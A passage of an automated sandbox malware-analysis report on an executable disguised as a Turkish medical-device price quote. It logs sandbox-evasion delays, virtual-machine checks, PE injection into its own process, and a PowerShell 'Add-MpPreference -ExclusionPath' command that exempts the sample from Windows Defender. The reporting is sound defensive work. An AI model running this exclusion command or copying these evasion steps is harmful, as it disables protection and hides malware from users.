                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -598031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -597047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596717s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596608s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596281s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596169s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -596061s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595952s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -595016s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -594797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -594687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -594578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe TID: 7868Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 599015Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598905Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598789Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598577Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598468Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597593Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 597047Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596717Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596608Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596390Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596169Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 596061Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595952Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 595016Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeThread delayed: delay time: 594469Jump to behavior
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000000.00000002.1325039921.00000000013A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3757593492.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <N
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeCode function: 7_2_05569548 LdrInitializeThunk,7_2_05569548
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeMemory written: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe"Jump to behavior
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002BCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe, 00000007.00000002.3759424707.0000000002BCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager<*P
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx _ .exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
